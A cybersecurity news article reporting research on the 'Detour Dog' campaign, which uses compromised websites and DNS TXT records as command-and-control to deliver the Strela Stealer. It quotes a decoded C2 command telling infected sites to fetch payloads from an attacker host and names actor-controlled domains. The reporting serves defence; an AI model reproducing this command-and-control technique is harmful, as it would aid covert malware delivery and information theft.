A sophisticated DNS-based malware campaign has emerged, utilizing thousands of compromised websites worldwide to deliver the Strela Stealer information-stealing malware through an unprecedented technique involving DNS TXT records.
The threat, tracked as Detour Dog by security researchers, represents a significant evolution in malware distribution methods that leverages the Domain Name System as both a command-and-control mechanism and delivery channel.
The malware campaign affects tens of thousands of websites globally, creating a vast network of infected hosts that communicate with actor-controlled name servers through specially crafted DNS queries.
These server-side DNS requests remain invisible to website visitors, allowing the malicious infrastructure to operate covertly while maintaining the appearance of legitimate web traffic.
The infected sites conditionally redirect visitors to malicious content based on their geographic location and device type, creating a sophisticated filtering mechanism that helps evade detection.
Detour Dog has evolved significantly from its origins as a redirect-to-scam operation.
The threat actor behind this campaign has been active since at least August 2023, initially focusing on redirecting users to fraudulent websites and tech support scams.
However, recent developments show a marked shift toward direct malware distribution, particularly in campaigns targeting European users with the Strela Stealer payload.
Infoblox analysts identified the connection between Detour Dog infrastructure and Strela Stealer operations during summer 2025, when they discovered that at least 69 percent of confirmed StarFish staging hosts were under Detour Dog control.
.webp)
This finding revealed that the threat actor was not merely redirecting traffic but actively participating in multi-stage malware delivery chains that culminated in information theft operations.
Advanced DNS TXT Command and Control Infrastructure
The technical sophistication of Detour Dog’s DNS-based command and control system represents a novel approach to malware communication that exploits the typically overlooked DNS TXT record functionality.
The infected websites generate DNS queries following a structured format that embeds victim information directly into the subdomain structure:-
....c2_domain The system underwent a significant upgrade in spring 2025 when operators added remote code execution capabilities triggered by Base64-encoded responses containing the keyword “down.”
When an infected site receives such a response, it strips the prefix and uses curl to fetch content from specified URLs, effectively turning compromised websites into proxy servers for malware distribution.
The DNS TXT responses follow a specific format that enables complex multi-stage payload delivery.
For example, a decoded response might appear as:-
downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67This command instructs the infected site to retrieve content from a StarFish C2 server and relay it back to the victim, creating a distributed delivery network that obscures the true source of malicious content.
The system supports both script.php and file.php endpoints, corresponding to different stages of the Strela Stealer delivery process.
The threat actor has demonstrated remarkable resilience in maintaining their infrastructure. When the Shadowserver Foundation sinkholed the webdmonitor.io domain in August 2025, Detour Dog operators established a replacement C2 server within hours, seamlessly transferring control of their infected website network to the new aeroarrows.io domain.
Analysis of sinkhole data revealed approximately 30,000 unique domains spanning 584 distinct top-level domains, all generating properly formatted DNS TXT queries to the actor-controlled infrastructure.
The scale and persistence of this operation highlight the effectiveness of DNS as a covert communication channel for malware operations.
The distributed nature of the infected website network, combined with the legitimate appearance of DNS traffic, creates significant challenges for traditional security monitoring systems that may not scrutinize TXT record communications with the same intensity applied to other network protocols.
This represents a significant advancement in malware distribution techniques, where DNS infrastructure serves dual purposes as both a command channel and a content delivery mechanism, creating a resilient and difficult-to-detect threat ecosystem.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
